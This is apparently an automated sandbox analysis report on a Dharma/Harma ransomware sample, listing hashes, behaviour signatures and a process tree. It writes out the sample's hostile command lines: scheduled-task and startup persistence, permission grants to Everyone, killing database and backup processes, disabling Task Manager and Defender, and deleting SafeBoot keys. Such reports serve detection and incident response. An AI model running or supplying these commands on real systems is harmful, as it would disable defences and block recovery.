Analysis
max time kernel: 151s
max time network: 146s
platform: windows7_x64
resource: win7-20231215-en
resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
submitted: 22-12-2023 00:08
Static task: static1
Behavioral task: behavioral1
  Sample: 30e1234ef3e570667526fdb006832b12.exe
  Resource: win7-20231215-en
Behavioral task: behavioral2
  Sample: 30e1234ef3e570667526fdb006832b12.exe
  Resource: win10v2004-20231215-en
General
Target: 30e1234ef3e570667526fdb006832b12.exe
Size: 913KB
MD5: 30e1234ef3e570667526fdb006832b12
SHA1: 01de8ba945945b58824f69553ac0f7b048645d45
SHA256: 72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2
SHA512: 00bd673f43cba1b16363433e672b30d22196fa0b67c024f970da15270323e545d15b3b990ed1dbbc3e7b9421c3f7840b10621c76203f89e0bcb1214e2a129e4e
SSDEEP: 24576:Utp7PNBIIr2i1VzBPZYpoEjH2NzQufi9Re+SfM+:uPSiJP+BH2NQufire+SfM+
Malware Config
Signatures
-
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
-
Renames multiple (4102) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Disables Task Manager via registry modification
-
Drops startup file (3 IoCs)
Processes: cmd.exe, attrib.exe
  File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe (cmd.exe)
  File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe (attrib.exe)
  File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe (cmd.exe)
-
Modifies file permissions (1 TTPs, 1 IoCs)
-
Enumerates connected drives (3 TTPs, 24 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes: 30e1234ef3e570667526fdb006832b12.exe (read-only opens of the drive roots A: through Z:, excluding C: and D:)
-
Drops file in Program Files directory (64 IoCs)
Processes: 30e1234ef3e570667526fdb006832b12.exe
Files under C:\Program Files and C:\Program Files (x86) are opened for modification and given the appended extension .id-79286055.[decryptioner@uncryptfile.com].HARMA.
-
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) (1 TTPs, 4 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes: schtasks.exe (4 instances)
  pid 2796 schtasks.exe
  pid 2744 schtasks.exe
  pid 2968 schtasks.exe
  pid 2416 schtasks.exe
-
Kills process with taskkill (2 IoCs)
Processes: taskkill.exe (2 instances)
  pid 2012 taskkill.exe
  pid 2648 taskkill.exe
-
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes: 30e1234ef3e570667526fdb006832b12.exe (pid 2228)
-
Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes: taskkill.exe (2 instances)
  Token: SeDebugPrivilege, pid 2648 taskkill.exe
  Token: SeDebugPrivilege, pid 2012 taskkill.exe
-
Suspicious use of WriteProcessMemory (64 IoCs)
Processes: 30e1234ef3e570667526fdb006832b12.exe, cmd.exe (7 instances)
Each write below appears four times in the log; the distinct parent-to-child writes are:
  PID 2228 (30e1234ef3e570667526fdb006832b12.exe) wrote to memory of 2776 (cmd.exe)
  PID 2776 (cmd.exe) wrote to memory of 2416 (schtasks.exe)
  PID 2228 (30e1234ef3e570667526fdb006832b12.exe) wrote to memory of 2280 (cmd.exe)
  PID 2228 (30e1234ef3e570667526fdb006832b12.exe) wrote to memory of 2328 (cmd.exe)
  PID 2228 (30e1234ef3e570667526fdb006832b12.exe) wrote to memory of 2740 (cmd.exe)
  PID 2740 (cmd.exe) wrote to memory of 2796 (schtasks.exe)
  PID 2228 (30e1234ef3e570667526fdb006832b12.exe) wrote to memory of 2808 (cmd.exe)
  PID 2808 (cmd.exe) wrote to memory of 2816 (attrib.exe)
  PID 2228 (30e1234ef3e570667526fdb006832b12.exe) wrote to memory of 3016 (cmd.exe)
  PID 3016 (cmd.exe) wrote to memory of 2744 (schtasks.exe)
  PID 2228 (30e1234ef3e570667526fdb006832b12.exe) wrote to memory of 2336 (cmd.exe)
  PID 2336 (cmd.exe) wrote to memory of 2968 (schtasks.exe)
  PID 2228 (30e1234ef3e570667526fdb006832b12.exe) wrote to memory of 2632 (cmd.exe)
  PID 2632 (cmd.exe) wrote to memory of 2728 (attrib.exe)
  PID 2228 (30e1234ef3e570667526fdb006832b12.exe) wrote to memory of 2820 (cmd.exe)
  PID 2820 (cmd.exe) wrote to memory of 2760 (attrib.exe)
-
Views/modifies file attributes (1 TTPs, 3 IoCs)
Processes: attrib.exe (3 instances)
  pid 2760 attrib.exe
  pid 2816 attrib.exe
  pid 2728 attrib.exe
Processes
Process tree (the bracketed number is the depth in the tree):

[1] C:\Users\Admin\AppData\Local\Temp\30e1234ef3e570667526fdb006832b12.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\30e1234ef3e570667526fdb006832b12.exe"
    - Enumerates connected drives
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F
        - Creates scheduled task(s)

  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
      - Drops startup file

  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"

  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F
        - Creates scheduled task(s)

  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\attrib.exe
        Command line: attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
        - Drops startup file
        - Views/modifies file attributes

  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN hrm /TR "C:\Users\Admin\AppData\Local\Temp\30e1234ef3e570667526fdb006832b12.exe" /RU SYSTEM /RL HIGHEST /F
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /CREATE /SC ONLOGON /TN hrm /TR "C:\Users\Admin\AppData\Local\Temp\30e1234ef3e570667526fdb006832b12.exe" /RU SYSTEM /RL HIGHEST /F
        - Creates scheduled task(s)

  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN Harma /TR "C:\Users\Admin\AppData\Local\Temp\30e1234ef3e570667526fdb006832b12.exe" /F
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /CREATE /SC ONLOGON /TN Harma /TR "C:\Users\Admin\AppData\Local\Temp\30e1234ef3e570667526fdb006832b12.exe" /F
        - Creates scheduled task(s)

  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c attrib +h +s harma.exe
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\attrib.exe
        Command line: attrib +h +s harma.exe
        - Views/modifies file attributes

  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\harma.exe
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\attrib.exe
        Command line: attrib +h +s C:\ProgramData\harma.exe
        - Views/modifies file attributes

  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
      [4] C:\Windows\SysWOW64\icacls.exe
          Command line: icacls * /grant Everyone:(OI)(CI)F /T /C /Q
          - Modifies file permissions

  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: cmd.exe /c taskkill /t /f /im sql*
      [4] C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /t /f /im sql*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /t /im veeam*
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    [3] C:\Windows\SysWOW64\reg.exe
        Command line: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c Copy HRMPRIV C:\ProgramData\HRMPRIV

  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c Copy HRMPUB C:\ProgramData\HRMPUB

  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c Copy id.harma C:\ProgramData\id.harma

  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\HRMPRIV %userprofile%\Desktop\HRMPRIV

  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\FILES ENCRYPTED.txt" "%userprofile%\Desktop\FILES ENCRYPTED.txt"

  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    [3] C:\Windows\SysWOW64\reg.exe
        Command line: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    [3] C:\Windows\SysWOW64\reg.exe
        Command line: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
    [3] C:\Windows\SysWOW64\reg.exe
        Command line: reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
    [3] C:\Windows\SysWOW64\reg.exe
        Command line: reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
C:\ProgramData\HRMPRIV (Filesize 2KB)
C:\ProgramData\harma.exe (Filesize 913KB; MD5, SHA1, SHA256 and SHA512 identical to the submitted sample)
C:\ProgramData\id.harma (Filesize 8B)
C:\Users\Admin\AppData\Local\Temp\HRMPUB (Filesize 292B)